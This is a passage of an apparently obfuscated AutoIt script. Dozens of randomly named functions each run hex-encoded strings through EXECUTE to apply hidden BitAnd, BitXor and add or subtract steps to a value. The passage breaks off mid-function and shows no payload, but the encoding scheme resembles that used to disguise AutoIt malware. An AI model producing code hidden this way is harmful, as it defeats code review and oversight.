  2350. $112O312031=EXECUTE(BINARYTOSTRING("0x426974416E6428243131324F3331323033312C313229"))
  2351. $112O312031=EXECUTE(BINARYTOSTRING("0x426974416E6428243131324F3331323033312C313529"))
  2352. $112O312031=EXECUTE(BINARYTOSTRING("0x243131324F3331323033312B3137"))
  2353. $112O312031=EXECUTE(BINARYTOSTRING("0x426974584F7228243131324F3331323033312C323029"))
  2354. $112O312031=EXECUTE(BINARYTOSTRING("0x243131324F3331323033312B3531"))
  2355. RETURN $112O312031
  2356. ENDFUNC
  2357. FUNC _I1001296532($162B2203732)
  2358. $162B2203732=EXECUTE(BINARYTOSTRING("0x2431363242323230333733322D3137"))
  2359. $162B2203732=EXECUTE(BINARYTOSTRING("0x426974416E64282431363242323230333733322C3529"))
  2360. $162B2203732=EXECUTE(BINARYTOSTRING("0x2431363242323230333733322B35"))
  2361. $162B2203732=EXECUTE(BINARYTOSTRING("0x2431363242323230333733322B313131"))
  2362. RETURN $162B2203732
  2363. ENDFUNC
  2364. FUNC _U880120833($90O1423433)
  2365. $90O1423433=EXECUTE(BINARYTOSTRING("0x426974416E64282439304F313432333433332C3529"))
  2366. $90O1423433=EXECUTE(BINARYTOSTRING("0x2439304F313432333433332D38"))
  2367. $90O1423433=EXECUTE(BINARYTOSTRING("0x426974584F72282439304F313432333433332C313929"))
  2368. $90O1423433=EXECUTE(BINARYTOSTRING("0x2439304F313432333433332D31"))
  2369. $90O1423433=EXECUTE(BINARYTOSTRING("0x426974584F72282439304F313432333433332C3929"))
  2370. $90O1423433=EXECUTE(BINARYTOSTRING("0x426974416E64282439304F313432333433332C313529"))
  2371. $90O1423433=EXECUTE(BINARYTOSTRING("0x2439304F313432333433332B3439"))
  2372. RETURN $90O1423433
  2373. ENDFUNC
  2374. FUNC _H1597142734($91P783334)
  2375. $91P783334=EXECUTE(BINARYTOSTRING("0x426974584F7228243931503738333333342C313229"))
  2376. $91P783334=EXECUTE(BINARYTOSTRING("0x426974584F7228243931503738333333342C3129"))
  2377. $91P783334=EXECUTE(BINARYTOSTRING("0x426974416E6428243931503738333333342C3129"))
  2378. $91P783334=EXECUTE(BINARYTOSTRING("0x243931503738333333342B34"))
  2379. $91P783334=EXECUTE(BINARYTOSTRING("0x243931503738333333342B3438"))
  2380. RETURN $91P783334
  2381. ENDFUNC
  2382. FUNC _U15111166335($122A2462435)
  2383. $122A2462435=EXECUTE(BINARYTOSTRING("0x2431323241323436323433352B34"))
  2384. $122A2462435=EXECUTE(BINARYTOSTRING("0x2431323241323436323433352B3130"))
  2385. $122A2462435=EXECUTE(BINARYTOSTRING("0x2431323241323436323433352B3230"))
  2386. $122A2462435=EXECUTE(BINARYTOSTRING("0x426974416E64282431323241323436323433352C313529"))
  2387. $122A2462435=EXECUTE(BINARYTOSTRING("0x426974416E64282431323241323436323433352C313229"))
  2388. $122A2462435=EXECUTE(BINARYTOSTRING("0x2431323241323436323433352B3437"))
  2389. RETURN $122A2462435
  2390. ENDFUNC
  2391. FUNC _K1361096236($173A1810636)
  2392. $173A1810636=EXECUTE(BINARYTOSTRING("0x426974416E64282431373341313831303633362C3229"))
  2393. $173A1810636=EXECUTE(BINARYTOSTRING("0x2431373341313831303633362D35"))
  2394. $173A1810636=EXECUTE(BINARYTOSTRING("0x2431373341313831303633362B3136"))
  2395. $173A1810636=EXECUTE(BINARYTOSTRING("0x2431373341313831303633362D38"))
  2396. $173A1810636=EXECUTE(BINARYTOSTRING("0x2431373341313831303633362B33"))
  2397. $173A1810636=EXECUTE(BINARYTOSTRING("0x2431373341313831303633362D3135"))
  2398. $173A1810636=EXECUTE(BINARYTOSTRING("0x426974416E64282431373341313831303633362C3729"))
  2399. $173A1810636=EXECUTE(BINARYTOSTRING("0x2431373341313831303633362B3437"))
  2400. RETURN $173A1810636
  2401. ENDFUNC
  2402. FUNC _P1609119637($152U456937)
  2403. $152U456937=EXECUTE(BINARYTOSTRING("0x426974416E642824313532553435363933372C323029"))
  2404. $152U456937=EXECUTE(BINARYTOSTRING("0x24313532553435363933372B3137"))
  2405. $152U456937=EXECUTE(BINARYTOSTRING("0x24313532553435363933372B3232"))
  2406. RETURN $152U456937
  2407. ENDFUNC
  2408. FUNC _E9111143738($175K2443038)
  2409. $175K2443038=EXECUTE(BINARYTOSTRING("0x243137354B323434333033382B34"))
  2410. $175K2443038=EXECUTE(BINARYTOSTRING("0x243137354B323434333033382B3130"))
  2411. $175K2443038=EXECUTE(BINARYTOSTRING("0x243137354B323434333033382B3230"))
  2412. $175K2443038=EXECUTE(BINARYTOSTRING("0x426974416E6428243137354B323434333033382C313529"))
  2413. $175K2443038=EXECUTE(BINARYTOSTRING("0x426974416E6428243137354B323434333033382C313229"))
  2414. $175K2443038=EXECUTE(BINARYTOSTRING("0x243137354B323434333033382B3434"))
  2415. RETURN $175K2443038
  2416. ENDFUNC
  2417. FUNC _E886166739($102Y2916739)
  2418. $102Y2916739=EXECUTE(BINARYTOSTRING("0x2431303259323931363733392B31"))
  2419. $102Y2916739=EXECUTE(BINARYTOSTRING("0x426974584F72282431303259323931363733392C313029"))
  2420. $102Y2916739=EXECUTE(BINARYTOSTRING("0x2431303259323931363733392B313138"))
  2421. RETURN $102Y2916739
  2422. ENDFUNC
  2423. FUNC _B661472240($150B1008440)
  2424. $150B1008440=EXECUTE(BINARYTOSTRING("0x426974416E64282431353042313030383434302C313329"))
  2425. $150B1008440=EXECUTE(BINARYTOSTRING("0x2431353042313030383434302B35"))
  2426. $150B1008440=EXECUTE(BINARYTOSTRING("0x426974416E64282431353042313030383434302C313229"))
  2427. $150B1008440=EXECUTE(BINARYTOSTRING("0x426974416E64282431353042313030383434302C313529"))
  2428. $150B1008440=EXECUTE(BINARYTOSTRING("0x2431353042313030383434302B3137"))
  2429. $150B1008440=EXECUTE(BINARYTOSTRING("0x426974584F72282431353042313030383434302C323029"))
  2430. $150B1008440=EXECUTE(BINARYTOSTRING("0x2431353042313030383434302B3437"))
  2431. RETURN $150B1008440
  2432. ENDFUNC
  2433. FUNC _B1031495741($160H502741)
  2434. $160H502741=EXECUTE(BINARYTOSTRING("0x426974416E642824313630483530323734312C313329"))
  2435. $160H502741=EXECUTE(BINARYTOSTRING("0x24313630483530323734312B35"))
  2436. $160H502741=EXECUTE(BINARYTOSTRING("0x426974416E642824313630483530323734312C313229"))
  2437. $160H502741=EXECUTE(BINARYTOSTRING("0x426974416E642824313630483530323734312C313529"))
  2438. $160H502741=EXECUTE(BINARYTOSTRING("0x24313630483530323734312B3137"))
  2439. $160H502741=EXECUTE(BINARYTOSTRING("0x426974584F722824313630483530323734312C323029"))
  2440. $160H502741=EXECUTE(BINARYTOSTRING("0x24313630483530323734312B3430"))
  2441. RETURN $160H502741
  2442. ENDFUNC
  2443. FUNC _C12013118842($113I1999242)
  2444. $113I1999242=EXECUTE(BINARYTOSTRING("0x426974416E64282431313349313939393234322C3629"))
  2445. $113I1999242=EXECUTE(BINARYTOSTRING("0x2431313349313939393234322B33"))
  2446. $113I1999242=EXECUTE(BINARYTOSTRING("0x2431313349313939393234322B3530"))
  2447. RETURN $113I1999242
  2448. ENDFUNC
  2449. FUNC _X1895143143($92A1930343)
  2450. $92A1930343=EXECUTE(BINARYTOSTRING("0x426974416E642824393241313933303334332C3729"))
  2451. $92A1930343=EXECUTE(BINARYTOSTRING("0x24393241313933303334332B35"))
  2452. $92A1930343=EXECUTE(BINARYTOSTRING("0x24393241313933303334332B3138"))
  2453. $92A1930343=EXECUTE(BINARYTOSTRING("0x426974584F722824393241313933303334332C313929"))
  2454. $92A1930343=EXECUTE(BINARYTOSTRING("0x24393241313933303334332D3133"))
  2455. $92A1930343=EXECUTE(BINARYTOSTRING("0x426974416E642824393241313933303334332C3329"))
  2456. $92A1930343=EXECUTE(BINARYTOSTRING("0x426974416E642824393241313933303334332C3129"))
  2457. $92A1930343=EXECUTE(BINARYTOSTRING("0x24393241313933303334332D39"))
  2458. $92A1930343=EXECUTE(BINARYTOSTRING("0x24393241313933303334332B3630"))
  2459. RETURN $92A1930343
  2460. ENDFUNC
  2461. FUNC _E941096644($131I1379744)
  2462. $131I1379744=EXECUTE(BINARYTOSTRING("0x426974416E64282431333149313337393734342C3229"))
  2463. $131I1379744=EXECUTE(BINARYTOSTRING("0x2431333149313337393734342D35"))
  2464. $131I1379744=EXECUTE(BINARYTOSTRING("0x2431333149313337393734342B3136"))
  2465. $131I1379744=EXECUTE(BINARYTOSTRING("0x2431333149313337393734342D38"))
  2466. $131I1379744=EXECUTE(BINARYTOSTRING("0x2431333149313337393734342B33"))
  2467. $131I1379744=EXECUTE(BINARYTOSTRING("0x2431333149313337393734342D3135"))
  2468. $131I1379744=EXECUTE(BINARYTOSTRING("0x426974416E64282431333149313337393734342C3729"))
  2469. $131I1379744=EXECUTE(BINARYTOSTRING("0x2431333149313337393734342B3437"))
  2470. RETURN $131I1379744
  2471. ENDFUNC
  2472. FUNC _Y12419119845($67H345845)
  2473. $67H345845=EXECUTE(BINARYTOSTRING("0x426974416E6428243637483334353834352C3829"))
  2474. $67H345845=EXECUTE(BINARYTOSTRING("0x243637483334353834352B3132"))
  2475. $67H345845=EXECUTE(BINARYTOSTRING("0x426974584F7228243637483334353834352C313429"))
  2476. $67H345845=EXECUTE(BINARYTOSTRING("0x243637483334353834352D33"))
  2477. $67H345845=EXECUTE(BINARYTOSTRING("0x426974416E6428243637483334353834352C313229"))
  2478. $67H345845=EXECUTE(BINARYTOSTRING("0x243637483334353834352B3530"))
  2479. RETURN $67H345845
  2480. ENDFUNC
  2481. FUNC _B12713143446($142D2110246)
  2482. $142D2110246=EXECUTE(BINARYTOSTRING("0x426974416E64282431343244323131303234362C3629"))
  2483. $142D2110246=EXECUTE(BINARYTOSTRING("0x2431343244323131303234362B33"))
  2484. $142D2110246=EXECUTE(BINARYTOSTRING("0x2431343244323131303234362B313131"))
  2485. RETURN $142D2110246
  2486. ENDFUNC
  2487. FUNC _R15313168647($103E223747)
  2488. $103E223747=EXECUTE(BINARYTOSTRING("0x426974416E642824313033453232333734372C3629"))
  2489. $103E223747=EXECUTE(BINARYTOSTRING("0x24313033453232333734372B33"))
  2490. $103E223747=EXECUTE(BINARYTOSTRING("0x24313033453232333734372B3439"))
  2491. RETURN $103E223747
  2492. ENDFUNC
  2493. FUNC _H164094748($167J2948248)
  2494. $167J2948248=EXECUTE(BINARYTOSTRING("0x426974416E6428243136374A323934383234382C3529"))
  2495. $167J2948248=EXECUTE(BINARYTOSTRING("0x243136374A323934383234382D38"))
  2496. $167J2948248=EXECUTE(BINARYTOSTRING("0x426974584F7228243136374A323934383234382C313929"))
  2497. $167J2948248=EXECUTE(BINARYTOSTRING("0x243136374A323934383234382D31"))
  2498. $167J2948248=EXECUTE(BINARYTOSTRING("0x426974584F7228243136374A323934383234382C3929"))
  2499. $167J2948248=EXECUTE(BINARYTOSTRING("0x426974416E6428243136374A323934383234382C313529"))
  2500. $167J2948248=EXECUTE(BINARYTOSTRING("0x243136374A323934383234382B3438"))
  2501. RETURN $167J2948248
  2502. ENDFUNC
  2503. FUNC _N13719117849($81H2749849)
  2504. $81H2749849=EXECUTE(BINARYTOSTRING("0x426974416E642824383148323734393834392C3829"))
  2505. $81H2749849=EXECUTE(BINARYTOSTRING("0x24383148323734393834392B3132"))
  2506. $81H2749849=EXECUTE(BINARYTOSTRING("0x426974584F722824383148323734393834392C313429"))
  2507. $81H2749849=EXECUTE(BINARYTOSTRING("0x24383148323734393834392D33"))
  2508. $81H2749849=EXECUTE(BINARYTOSTRING("0x426974416E642824383148323734393834392C313229"))
  2509. $81H2749849=EXECUTE(BINARYTOSTRING("0x24383148323734393834392B3430"))
  2510. RETURN $81H2749849
  2511. ENDFUNC
  2512. FUNC _W10914142350($184G1060550)
  2513. $184G1060550=EXECUTE(BINARYTOSTRING("0x426974416E64282431383447313036303535302C313329"))
  2514. $184G1060550=EXECUTE(BINARYTOSTRING("0x2431383447313036303535302B35"))
  2515. $184G1060550=EXECUTE(BINARYTOSTRING("0x426974416E64282431383447313036303535302C313229"))
  2516. $184G1060550=EXECUTE(BINARYTOSTRING("0x426974416E64282431383447313036303535302C313529"))
  2517. $184G1060550=EXECUTE(BINARYTOSTRING("0x2431383447313036303535302B3137"))
  2518. $184G1060550=EXECUTE(BINARYTOSTRING("0x426974584F72282431383447313036303535302C323029"))
  2519. $184G1060550=EXECUTE(BINARYTOSTRING("0x2431383447313036303535302B3439"))
  2520. RETURN $184G1060550
  2521. ENDFUNC
  2522. FUNC _M1415166851($108Q1102351)
  2523. $108Q1102351=EXECUTE(BINARYTOSTRING("0x426974416E64282431303851313130323335312C3729"))
  2524. $108Q1102351=EXECUTE(BINARYTOSTRING("0x2431303851313130323335312B35"))
  2525. $108Q1102351=EXECUTE(BINARYTOSTRING("0x2431303851313130323335312B3138"))
  2526. $108Q1102351=EXECUTE(BINARYTOSTRING("0x426974584F72282431303851313130323335312C313929"))
  2527. $108Q1102351=EXECUTE(BINARYTOSTRING("0x2431303851313130323335312D3133"))
  2528. $108Q1102351=EXECUTE(BINARYTOSTRING("0x426974416E64282431303851313130323335312C3329"))
  2529. $108Q1102351=EXECUTE(BINARYTOSTRING("0x426974416E64282431303851313130323335312C3129"))
  2530. $108Q1102351=EXECUTE(BINARYTOSTRING("0x2431303851313130323335312D39"))
  2531. $108Q1102351=EXECUTE(BINARYTOSTRING("0x2431303851313130323335312B3630"))
  2532. RETURN $108Q1102351
  2533. ENDFUNC
  2534. FUNC _T183570452($103T2844452)
  2535. $103T2844452=EXECUTE(BINARYTOSTRING("0x426974416E64282431303354323834343435322C3729"))
  2536. $103T2844452=EXECUTE(BINARYTOSTRING("0x2431303354323834343435322B35"))
  2537. $103T2844452=EXECUTE(BINARYTOSTRING("0x2431303354323834343435322B3138"))
  2538. $103T2844452=EXECUTE(BINARYTOSTRING("0x426974584F72282431303354323834343435322C313929"))
  2539. $103T2844452=EXECUTE(BINARYTOSTRING("0x2431303354323834343435322D3133"))
  2540. $103T2844452=EXECUTE(BINARYTOSTRING("0x426974416E64282431303354323834343435322C3329"))
  2541. $103T2844452=EXECUTE(BINARYTOSTRING("0x426974416E64282431303354323834343435322C3129"))
  2542. $103T2844452=EXECUTE(BINARYTOSTRING("0x2431303354323834343435322D39"))
  2543. $103T2844452=EXECUTE(BINARYTOSTRING("0x2431303354323834343435322B3631"))
  2544. RETURN $103T2844452
  2545. ENDFUNC
  2546. FUNC _N1891493453($179I453553)
  2547. $179I453553=EXECUTE(BINARYTOSTRING("0x426974416E642824313739493435333535332C313329"))
  2548. $179I453553=EXECUTE(BINARYTOSTRING("0x24313739493435333535332B35"))
  2549. $179I453553=EXECUTE(BINARYTOSTRING("0x426974416E642824313739493435333535332C313229"))
  2550. $179I453553=EXECUTE(BINARYTOSTRING("0x426974416E642824313739493435333535332C313529"))
  2551. $179I453553=EXECUTE(BINARYTOSTRING("0x24313739493435333535332B3137"))
  2552. $179I453553=EXECUTE(BINARYTOSTRING("0x426974584F722824313739493435333535332C323029"))
  2553. $179I453553=EXECUTE(BINARYTOSTRING("0x24313739493435333535332B3433"))
  2554. RETURN $179I453553
  2555. ENDFUNC
  2556. FUNC _Z18813117854($87Q743754)
  2557. $87Q743754=EXECUTE(BINARYTOSTRING("0x426974416E6428243837513734333735342C3629"))
  2558. $87Q743754=EXECUTE(BINARYTOSTRING("0x243837513734333735342B33"))
  2559. $87Q743754=EXECUTE(BINARYTOSTRING("0x243837513734333735342B3433"))
  2560. RETURN $87Q743754
  2561. ENDFUNC
  2562. FUNC _W1885142455($93I1965655)
  2563. $93I1965655=EXECUTE(BINARYTOSTRING("0x426974416E642824393349313936353635352C3729"))
  2564. $93I1965655=EXECUTE(BINARYTOSTRING("0x24393349313936353635352B35"))
  2565. $93I1965655=EXECUTE(BINARYTOSTRING("0x24393349313936353635352B3138"))
  2566. $93I1965655=EXECUTE(BINARYTOSTRING("0x426974584F722824393349313936353635352C313929"))
  2567. $93I1965655=EXECUTE(BINARYTOSTRING("0x24393349313936353635352D3133"))
  2568. $93I1965655=EXECUTE(BINARYTOSTRING("0x426974416E642824393349313936353635352C3329"))
  2569. $93I1965655=EXECUTE(BINARYTOSTRING("0x426974416E642824393349313936353635352C3129"))
  2570. $93I1965655=EXECUTE(BINARYTOSTRING("0x24393349313936353635352D39"))
  2571. $93I1965655=EXECUTE(BINARYTOSTRING("0x24393349313936353635352B3538"))
  2572. RETURN $93I1965655
  2573. ENDFUNC
  2574. FUNC _B1501268856($71D2463856)
  2575. $71D2463856=EXECUTE(BINARYTOSTRING("0x24373144323436333835362D3137"))
  2576. $71D2463856=EXECUTE(BINARYTOSTRING("0x426974416E642824373144323436333835362C3529"))
  2577. $71D2463856=EXECUTE(BINARYTOSTRING("0x24373144323436333835362B35"))
  2578. $71D2463856=EXECUTE(BINARYTOSTRING("0x24373144323436333835362B3338"))
  2579. RETURN $71D2463856
  2580. ENDFUNC
  2581. FUNC _E94991757($139S3025257)
  2582. $139S3025257=EXECUTE(BINARYTOSTRING("0x426974416E64282431333953333032353235372C323029"))
  2583. $139S3025257=EXECUTE(BINARYTOSTRING("0x2431333953333032353235372B3137"))
  2584. $139S3025257=EXECUTE(BINARYTOSTRING("0x2431333953333032353235372B3334"))
  2585. RETURN $139S3025257
  2586. ENDFUNC
  2587. FUNC _X15710112158($82J3109958)
  2588. $82J3109958=EXECUTE(BINARYTOSTRING("0x426974416E64282438324A333130393935382C3229"))
  2589. $82J3109958=EXECUTE(BINARYTOSTRING("0x2438324A333130393935382D35"))
  2590. $82J3109958=EXECUTE(BINARYTOSTRING("0x2438324A333130393935382B3136"))
  2591. $82J3109958=EXECUTE(BINARYTOSTRING("0x2438324A333130393935382D38"))
  2592. $82J3109958=EXECUTE(BINARYTOSTRING("0x2438324A333130393935382B33"))
  2593. $82J3109958=EXECUTE(BINARYTOSTRING("0x2438324A333130393935382D3135"))
  2594. $82J3109958=EXECUTE(BINARYTOSTRING("0x426974416E64282438324A333130393935382C3729"))
  2595. $82J3109958=EXECUTE(BINARYTOSTRING("0x2438324A333130393935382B3630"))
  2596. RETURN $82J3109958
  2597. ENDFUNC
  2598. FUNC _V1355136759($107M386559)
  2599. $107M386559=EXECUTE(BINARYTOSTRING("0x426974416E6428243130374D3338363535392C3729"))
  2600. $107M386559=EXECUTE(BINARYTOSTRING("0x243130374D3338363535392B35"))
  2601. $107M386559=EXECUTE(BINARYTOSTRING("0x243130374D3338363535392B3138"))
  2602. $107M386559=EXECUTE(BINARYTOSTRING("0x426974584F7228243130374D3338363535392C313929"))
  2603. $107M386559=EXECUTE(BINARYTOSTRING("0x243130374D3338363535392D3133"))
  2604. $107M386559=EXECUTE(BINARYTOSTRING("0x426974416E6428243130374D3338363535392C3329"))
  2605. $107M386559=EXECUTE(BINARYTOSTRING("0x426974416E6428243130374D3338363535392C3129"))
  2606. $107M386559=EXECUTE(BINARYTOSTRING("0x243130374D3338363535392D39"))
  2607. $107M386559=EXECUTE(BINARYTOSTRING("0x243130374D3338363535392B3633"))
  2608. RETURN $107M386559
  2609. ENDFUNC
  2610. FUNC _U17411128960($74V2384660)
  2611. $74V2384660=EXECUTE(BINARYTOSTRING("0x24373456323338343636302B34"))
  2612. $74V2384660=EXECUTE(BINARYTOSTRING("0x24373456323338343636302B3130"))
  2613. $74V2384660=EXECUTE(BINARYTOSTRING("0x24373456323338343636302B3230"))
  2614. $74V2384660=EXECUTE(BINARYTOSTRING("0x426974416E642824373456323338343636302C313529"))
  2615. $74V2384660=EXECUTE(BINARYTOSTRING("0x426974416E642824373456323338343636302C313229"))
  2616. $74V2384660=EXECUTE(BINARYTOSTRING("0x24373456323338343636302B3435"))
  2617. RETURN $74V2384660
  2618. ENDFUNC
  2619. FUNC _T1740152061($117H1282961)
  2620. $117H1282961=EXECUTE(BINARYTOSTRING("0x426974416E64282431313748313238323936312C3529"))
  2621. $117H1282961=EXECUTE(BINARYTOSTRING("0x2431313748313238323936312D38"))
  2622. $117H1282961=EXECUTE(BINARYTOSTRING("0x426974584F72282431313748313238323936312C313929"))
  2623. $117H1282961=EXECUTE(BINARYTOSTRING("0x2431313748313238323936312D31"))
  2624. $117H1282961=EXECUTE(BINARYTOSTRING("0x426974584F72282431313748313238323936312C3929"))
  2625. $117H1282961=EXECUTE(BINARYTOSTRING("0x426974416E64282431313748313238323936312C313529"))
  2626. $117H1282961=EXECUTE(BINARYTOSTRING("0x2431313748313238323936312B3439"))
  2627. RETURN $117H1282961
  2628. ENDFUNC
  2629. FUNC _V17014176862($144V878262)
  2630. $144V878262=EXECUTE(BINARYTOSTRING("0x426974416E642824313434563837383236322C313329"))
  2631. $144V878262=EXECUTE(BINARYTOSTRING("0x24313434563837383236322B35"))
  2632. $144V878262=EXECUTE(BINARYTOSTRING("0x426974416E642824313434563837383236322C313229"))
  2633. $144V878262=EXECUTE(BINARYTOSTRING("0x426974416E642824313434563837383236322C313529"))
  2634. $144V878262=EXECUTE(BINARYTOSTRING("0x24313434563837383236322B3137"))
  2635. $144V878262=EXECUTE(BINARYTOSTRING("0x426974584F722824313434563837383236322C323029"))
  2636. $144V878262=EXECUTE(BINARYTOSTRING("0x24313434563837383236322B3530"))
  2637. RETURN $144V878262
  2638. ENDFUNC
  2639. FUNC _V18213201263($141Y2913163)
  2640. $141Y2913163=EXECUTE(BINARYTOSTRING("0x426974416E64282431343159323931333136332C3629"))
  2641. $141Y2913163=EXECUTE(BINARYTOSTRING("0x2431343159323931333136332B33"))
  2642. $141Y2913163=EXECUTE(BINARYTOSTRING("0x2431343159323931333136332B3530"))
  2643. RETURN $141Y2913163
  2644. ENDFUNC
  2645. FUNC _Z11017130364($69Y2637464)
  2646. $69Y2637464=EXECUTE(BINARYTOSTRING("0x426974416E642824363959323633373436342C313829"))
  2647. $69Y2637464=EXECUTE(BINARYTOSTRING("0x426974416E642824363959323633373436342C313029"))
  2648. $69Y2637464=EXECUTE(BINARYTOSTRING("0x426974584F722824363959323633373436342C3829"))
  2649. $69Y2637464=EXECUTE(BINARYTOSTRING("0x24363959323633373436342B3430"))
  2650. RETURN $69Y2637464
  2651. ENDFUNC
  2652. FUNC _Q1234155065($146T892865)
  2653. $146T892865=EXECUTE(BINARYTOSTRING("0x426974416E642824313436543839323836352C3229"))
  2654. $146T892865=EXECUTE(BINARYTOSTRING("0x426974416E642824313436543839323836352C3529"))
  2655. $146T892865=EXECUTE(BINARYTOSTRING("0x426974584F722824313436543839323836352C313529"))
  2656. $146T892865=EXECUTE(BINARYTOSTRING("0x24313436543839323836352D39"))
  2657. $146T892865=EXECUTE(BINARYTOSTRING("0x24313436543839323836352D35"))
  2658. $146T892865=EXECUTE(BINARYTOSTRING("0x426974416E642824313436543839323836352C313229"))
  2659. $146T892865=EXECUTE(BINARYTOSTRING("0x426974584F722824313436543839323836352C3529"))
  2660. $146T892865=EXECUTE(BINARYTOSTRING("0x426974416E642824313436543839323836352C313929"))
  2661. $146T892865=EXECUTE(BINARYTOSTRING("0x24313436543839323836352B3531"))
  2662. RETURN $146T892865
  2663. ENDFUNC
  2664. FUNC _Y9018179666($118R1263166)
  2665. $118R1263166=EXECUTE(BINARYTOSTRING("0x426974584F72282431313852313236333136362C3229"))
  2666. $118R1263166=EXECUTE(BINARYTOSTRING("0x426974584F72282431313852313236333136362C3829"))
  2667. $118R1263166=EXECUTE(BINARYTOSTRING("0x2431313852313236333136362B3934"))
  2668. RETURN $118R1263166
  2669. ENDFUNC
  2670. FUNC _Q1174203367($130W3119067)
  2671. $130W3119067=EXECUTE(BINARYTOSTRING("0x426974416E64282431333057333131393036372C3229"))
  2672. $130W3119067=EXECUTE(BINARYTOSTRING("0x426974416E64282431333057333131393036372C3529"))
  2673. $130W3119067=EXECUTE(BINARYTOSTRING("0x426974584F72282431333057333131393036372C313529"))
  2674. $130W3119067=EXECUTE(BINARYTOSTRING("0x2431333057333131393036372D39"))
  2675. $130W3119067=EXECUTE(BINARYTOSTRING("0x2431333057333131393036372D35"))
  2676. $130W3119067=EXECUTE(BINARYTOSTRING("0x426974416E64282431333057333131393036372C313229"))
  2677. $130W3119067=EXECUTE(BINARYTOSTRING("0x426974584F72282431333057333131393036372C3529"))
  2678. $130W3119067=EXECUTE(BINARYTOSTRING("0x426974416E64282431333057333131393036372C313929"))
  2679. $130W3119067=EXECUTE(BINARYTOSTRING("0x2431333057333131393036372B3534"))
  2680. RETURN $130W3119067
  2681. ENDFUNC
  2682. FUNC _O1229132568($163J2477368)
  2683. $163J2477368=EXECUTE(BINARYTOSTRING("0x426974416E6428243136334A323437373336382C323029"))
  2684. $163J2477368=EXECUTE(BINARYTOSTRING("0x243136334A323437373336382B3137"))
  2685. $163J2477368=EXECUTE(BINARYTOSTRING("0x243136334A323437373336382B3332"))
  2686. RETURN $163J2477368
  2687. ENDFUNC
  2688. FUNC _Y18813156969($85C523569)
  2689. $85C523569=EXECUTE(BINARYTOSTRING("0x426974416E6428243835433532333536392C3629"))
  2690. $85C523569=EXECUTE(BINARYTOSTRING("0x243835433532333536392B33"))
  2691. $85C523569=EXECUTE(BINARYTOSTRING("0x243835433532333536392B313135"))
  2692. RETURN $85C523569
  2693. ENDFUNC
  2694. FUNC _K15819181370($82B2978270)
  2695. $82B2978270=EXECUTE(BINARYTOSTRING("0x426974416E642824383242323937383237302C3829"))
  2696. $82B2978270=EXECUTE(BINARYTOSTRING("0x24383242323937383237302B3132"))
  2697. $82B2978270=EXECUTE(BINARYTOSTRING("0x426974584F722824383242323937383237302C313429"))
  2698. $82B2978270=EXECUTE(BINARYTOSTRING("0x24383242323937383237302D33"))
  2699. $82B2978270=EXECUTE(BINARYTOSTRING("0x426974416E642824383242323937383237302C313229"))
  2700. $82B2978270=EXECUTE(BINARYTOSTRING("0x24383242323937383237302B3431"))
  2701. RETURN $82B2978270
  2702. ENDFUNC
  2703. FUNC _J12912205671($185Y2269071)
  2704. $185Y2269071=EXECUTE(BINARYTOSTRING("0x2431383559323236393037312D3137"))
  2705. $185Y2269071=EXECUTE(BINARYTOSTRING("0x426974416E64282431383559323236393037312C3529"))
  2706. $185Y2269071=EXECUTE(BINARYTOSTRING("0x2431383559323236393037312B35"))
  2707. $185Y2269071=EXECUTE(BINARYTOSTRING("0x2431383559323236393037312B3432"))
  2708. RETURN $185Y2269071
  2709. ENDFUNC
  2710. FUNC _Q1781438072($94I3176172)
  2711. $94I3176172=EXECUTE(BINARYTOSTRING("0x426974416E642824393449333137363137322C313329"))
  2712. $94I3176172=EXECUTE(BINARYTOSTRING("0x24393449333137363137322B35"))
  2713. $94I3176172=EXECUTE(BINARYTOSTRING("0x426974416E642824393449333137363137322C313229"))
  2714. $94I3176172=EXECUTE(BINARYTOSTRING("0x426974416E642824393449333137363137322C313529"))
  2715. $94I3176172=EXECUTE(BINARYTOSTRING("0x24393449333137363137322B3137"))
  2716. $94I3176172=EXECUTE(BINARYTOSTRING("0x426974584F722824393449333137363137322C323029"))
  2717. $94I3176172=EXECUTE(BINARYTOSTRING("0x24393449333137363137322B313037"))
  2718. RETURN $94I3176172
  2719. ENDFUNC
  2720. FUNC _Z1461162073($66P2570673)
  2721. $66P2570673=EXECUTE(BINARYTOSTRING("0x24363650323537303637332B34"))
  2722. $66P2570673=EXECUTE(BINARYTOSTRING("0x24363650323537303637332B3130"))
  2723. $66P2570673=EXECUTE(BINARYTOSTRING("0x24363650323537303637332B3230"))
  2724. $66P2570673=EXECUTE(BINARYTOSTRING("0x426974416E642824363650323537303637332C313529"))
  2725. $66P2570673=EXECUTE(BINARYTOSTRING("0x426974416E642824363650323537303637332C313229"))
  2726. $66P2570673=EXECUTE(BINARYTOSTRING("0x24363650323537303637332B3336"))
  2727. RETURN $66P2570673
  2728. ENDFUNC
  2729. FUNC _W1521339274($117R1924574)
  2730. $117R1924574=EXECUTE(BINARYTOSTRING("0x426974416E64282431313752313932343537342C3629"))
  2731. $117R1924574=EXECUTE(BINARYTOSTRING("0x2431313752313932343537342B33"))
  2732. $117R1924574=EXECUTE(BINARYTOSTRING("0x2431313752313932343537342B313135"))
  2733. RETURN $117R1924574
  2734. ENDFUNC
  2735. FUNC _M1271762275($106P616475)
  2736. $106P616475=EXECUTE(BINARYTOSTRING("0x426974416E642824313036503631363437352C313829"))
  2737. $106P616475=EXECUTE(BINARYTOSTRING("0x426974416E642824313036503631363437352C313029"))
  2738. $106P616475=EXECUTE(BINARYTOSTRING("0x426974584F722824313036503631363437352C3829"))
  2739. $106P616475=EXECUTE(BINARYTOSTRING("0x24313036503631363437352B3430"))
  2740. RETURN $106P616475
  2741. ENDFUNC
  2742. FUNC _J153486476($79H1140876)
  2743. $79H1140876=EXECUTE(BINARYTOSTRING("0x426974416E642824373948313134303837362C3229"))
  2744. $79H1140876=EXECUTE(BINARYTOSTRING("0x426974416E642824373948313134303837362C3529"))
  2745. $79H1140876=EXECUTE(BINARYTOSTRING("0x426974584F722824373948313134303837362C313529"))
  2746. $79H1140876=EXECUTE(BINARYTOSTRING("0x24373948313134303837362D39"))
  2747. $79H1140876=EXECUTE(BINARYTOSTRING("0x24373948313134303837362D35"))
  2748. $79H1140876=EXECUTE(BINARYTOSTRING("0x426974416E642824373948313134303837362C313229"))
  2749. $79H1140876=EXECUTE(BINARYTOSTRING("0x426974584F722824373948313134303837362C3529"))
  2750. $79H1140876=EXECUTE(BINARYTOSTRING("0x426974416E642824373948313134303837362C313929"))
  2751. $79H1140876=EXECUTE(BINARYTOSTRING("0x24373948313134303837362B3439"))
  2752. RETURN $79H1140876
  2753. ENDFUNC
  2754. FUNC _P1031090977($90F707477)
  2755. $90F707477=EXECUTE(BINARYTOSTRING("0x426974416E6428243930463730373437372C3229"))
